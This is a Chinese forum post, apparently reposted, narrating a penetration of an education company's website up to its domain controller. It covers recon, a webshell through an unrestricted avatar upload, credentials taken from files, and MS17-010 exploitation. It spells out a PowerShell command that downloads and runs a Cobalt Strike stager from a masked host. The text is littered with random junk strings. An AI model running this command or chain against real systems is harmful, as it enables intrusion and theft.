找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2136|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

F( { N; ~" z) x" D+ r 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路1 ~* M, M, f3 i, X4 Q6 y, c" x7 i

, c% W/ y& z; @( s

( u/ W$ _1 N+ o7 i* l, ?8 |  " v3 u5 h$ j% U4 g* b; `

( O! i1 r# L3 W6 `1 F* R

# v0 ^1 _$ }. w K7 Z0 Y 正文 + g+ T) z; b. `) n V8 A

1 r. C' ^# M( W) C. r6 J$ M

/ g1 U, ^: ~" B% J  - H$ d" u& j3 f+ o9 w

9 C/ U, \. O" h6 ^4 ~) B

. J: b! D/ k% ]7 D+ B 目标:www.xxxx.com(一家教育机构)
G- a6 r; `5 M/ n% G2 R
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
$ {, t, Z6 o7 p, v

& e/ P0 Z1 R3 @! D

" h' n5 G/ z, P6 f4 {4 j3 ^ vshapes= 4 r2 `& E, T- a1 D# S

# R6 T! r$ k! a2 }1 F' c

) v5 z1 ^6 n, v0 w& C6 S! x1 J 进行了简单的信息搜集
9 p1 ?( Y! w- R1 E, {7 E4 v1 v0 y
- }) [; c, b" g. t0 t0 K" B4 R1 Z
; i& I+ G# v3 L7 I

* X- w7 \: a: {9 A

0 a/ t1 S% V$ d+ n: D5 T: \- [ 子域名搜集 5 q. `2 U( y& y% F/ B

3 @0 a. ]9 G9 k- _4 V

# X* V; o. Q0 M vshapes=7 f3 {' K& q/ g- Q0 g* q

: y$ {7 b0 Q4 v& A5 J( ^

5 y- K `& P' @/ p1 \5 ?/ {$ V fofa找资产
g5 l7 x4 S: M
1 ]0 P" L* d* R% D5 i0 t: R) p4 c
, p8 M w" e1 h4 |4 ^) P) ^+ y

& y7 J+ h- Y( W( `0 m

3 V. H6 L! [. B% g% C5 w vshapes= ' i' u* A `8 B

1 X5 O ?, {% ?; |# t# d4 ~8 H

6 i d9 l, V! D' A/ { r2 E 一共七个资产。去重之后只有两个。
& m0 C( F) I R: {
3 c9 R; w5 v7 T
2 U9 H2 h% P& h; u% f$ R

+ [/ J. E6 n: C6 i" ~

! C4 T) V; {3 K 目录探测 & W+ \# A! o! |. }- H$ J

1 M1 S! i- h* z" V1 S6 C( E

- J# L, _' m* J- F' o) L+ m/ @ vshapes=0 p' I$ y5 T. Z/ M N: G8 ?( m0 ~

+ I8 r) `1 l: c$ V. ~

d2 c6 D2 f! l+ o% @* |) } x 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! _- ^- Z: t- o
5 v9 m& |$ f7 z* Y/ b2 p& w
Z) T+ X! j; a

/ Q* U! B: l( }: P' h: k( W

2 |( ?( o2 A* b% p# e3 R$ ~ 我又尝试了通过修改返回包来绕过登录界面 5 r6 y4 l5 O# o$ h6 o3 D1 F3 I

1 K5 u* G" S, R! \9 B

7 x5 l2 Y5 j( ~ vshapes= . ?8 e- @. u4 B7 b7 ~4 q, m' ]

# C. w+ h. a2 G% Z, q0 S" ~% x

: m. o! j* S# C2 C1 n# \ 还是不行,尝试注入无果% z0 J0 f& ~/ U( s$ R

- l. n; K. A* }$ g: E. E

$ [# M) r9 f, T& o vshapes=0 g) y6 _$ L& T/ [9 E* e

, R( Z# A y* ^4 H

/ G- h+ q$ ^$ } 不过我目录探测出了一处Spring信息泄露
7 Z+ F1 y6 G. ~5 q4 @
9 ?! Z" w( [( e. l
( E X+ a$ y! R0 z

/ Q3 _$ n; L3 t9 j

/ s% Z0 `5 C8 j( B( X vshapes=, u) `7 t3 n: f

% {4 H2 r% [& k

4 `$ k L8 G# S 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 2 ]* o. w$ ]; n$ t9 r' R1 u L

; s$ I$ B8 J: X( @5 ?& ^

' g/ t) u7 Q$ x vshapes=* n: t' `5 W5 V$ R3 Q' d

. y: H- D( ?, t5 Q7 A6 z

- x6 J& C, p1 s/ A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 8 S- D4 E# d" x. ~( ]% g+ y, t! k

! A, Y7 ~9 e8 `- j- |# N

- u6 h' o6 U* u# A/ Y5 W, k vshapes= w- j! d& f. ]9 t

# K3 F3 l) S$ q

! S9 h8 K5 r' I) O Y/ Y 获取有些师傅到这一步就手机抓包电脑测了。1 ~0 F1 j5 Y2 P3 f3 Q1 P

: J6 p6 h% N. r

) R( I; X* X5 T6 N6 X6 O Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 M( P8 S( y: x7 x

/ t- F% p1 E' ?1 L; @. B

' R( P8 Y4 Q* C! m! K) ^ 其中在一个公众号发现了小程序,可以进行注册。 & g3 A# X- `5 [. s4 u

! S* B4 o; S* {& E; o

6 m% U5 Y4 Y! i/ T. P: L% U 看到了头像上传,尝试上传获取WebShell, d+ Q( O; ]$ {; X I- [' ]

. t+ y* h# A6 r) o E+ e. O i

2 N" l1 Y5 w! Q1 t vshapes=, T$ ^: v Z; n [8 m; J/ `4 i% `

4 H/ i- _9 j& j5 D- W0 q, q

) H% s, P( q, d4 L5 Q( _ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 B+ p; d- _* y1 P

/ {5 _( x& c8 I% u

0 s; s) U+ i* }$ W4 Z' N, k, t: T vshapes= 1 _' e* _! q b4 z8 _5 x

) |- I" s h& X8 Q# P, f9 L) x; N

& ^3 ?( c5 q$ _" X* H, k* Y8 ^ 然后上了大马 5 B3 [0 k3 o/ {$ d2 l: A7 z* H9 `

- I/ u" C- U& J. p0 A7 g* R4 J: d

0 W3 v6 \4 m d7 v9 F4 [ vshapes=4 C# f6 q) r6 p: s6 X7 }5 b7 u; E. q

$ R4 Z% R3 }" g& M

2 R f7 J6 z: Q4 m vshapes= 6 R z9 y% p% A. y C7 p$ T

1 ^1 f* R, ^2 Q

, k3 `! x( {6 j/ j' |- Z 通过翻找文件发现数据库账号密码. a8 y/ d9 ?1 Y' {

; s7 Z! o1 a% M- W" Y

/ r2 _# }) e/ [# q/ z) T vshapes= g/ p/ s! @/ S( W

% J& K5 ~% C7 O1 N: t

& p' S3 ]. Y9 {' W# o) F5 H --内网渗透9 j3 ?4 R$ u F+ Y6 r) n

$ T( e7 o( [0 {

& T' }5 h& n9 n' g. b 直接通过powershell执行 cs上线 ) L3 U' s: ^: ~* L A+ T

* H5 N1 q0 B" P7 I( y

) [* F1 }0 ^- N! ~3 X powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 8 A2 }" c* k, r' f L5 t' P3 b

. Y" @( f4 D1 e

3 v6 W- b: j4 G vshapes= % ^! a6 @! ] |& [* e- l

/ K: c, l* y( c5 t8 v, a2 f

6 c& J( m7 f& V- X7 h: \( N 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 % M$ b1 }; ~" U

1 m, I' A: m. d6 v

" E, I; \# ] ~' K9 J vshapes= w' c6 a% m3 b! Y; G

. K. L" V5 c( K/ q. ^ i9 h4 B8 g

2 S8 c; F( r, `7 Y6 v 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! u$ F" B- y% Z4 V3 Q: M1 A" f
, ?" n. M; f7 p Q
3 @! q( [+ ]3 z5 ^4 v
' \: V l4 j9 ^& e) {$ h* h% Z

8 c$ D6 {# R$ u

$ M& P% ^' W) N2 o vshapes=" o5 N' s, G3 Q& u: j4 M

# z' o& N' N9 A

0 C& o+ i$ f% f3 \+ W 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
3 |& x6 {! G! _& B0 E
) O6 q" y" b( y% O$ j
: `* l2 g7 O4 u# O+ B

' |6 L3 |1 T6 X7 h# l

" | x$ y! Y& ?& C4 U) a, ^ vshapes= @* b- ?- Y- x+ |4 w

( P G8 e" A( g( B) h" t

! @4 J6 w. |; b7 C
9 y% ^; B9 p" \/ M, `. A9 o; W2 y
9 M" Y/ M, H9 O) J& M
8 E7 |" C# h8 W. E5 K

& j( D5 t& K# c: z b# F& L

) }0 J" E* J" \$ J  ; M8 q! [$ V( L

5 X+ \' h% O' U- c2 J

v6 m+ t9 C9 v2 J: s0 F5 m3 r4 Q$ } 小结6 L- K9 V6 @6 U+ E) W

6 m0 V0 h' o+ t* w5 R/ ^

0 n3 ~# B: E& \  # l8 {! m, S% ^9 ]- Q

. \! W! x: K; t! D

3 c6 T6 d" L/ V' ~ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!" Z% V7 Y% n' V2 C% d& C

0 [8 F) k- @2 Q

2 ~ R$ P! k; r2 G  & d. J, b! p, a

6 u6 F% a; U9 ^+ {
    + ?% T4 \- ^- i% j
  • / Q7 X2 c9 M) A/ w" \   ( P' e. H. x; D1 W8 F& J
  • / u" B1 n- t" k6 E
  • 2 Z8 ^* E( r3 t9 B1 C2 d9 |   $ i& |6 e# h5 k# V3 [
  • 7 X1 N& _6 r! x( A$ b- A% M
0 y/ K2 |- Q) g ]' d$ x

3 l! `# l, ^5 D# R5 Z n. `; T 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html% Q6 F5 _: ~% ?9 B

+ T4 C0 ?# w O5 d, Q

2 Q4 e6 M J0 u2 h1 Q   & S9 X8 O; i, n* L) S

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表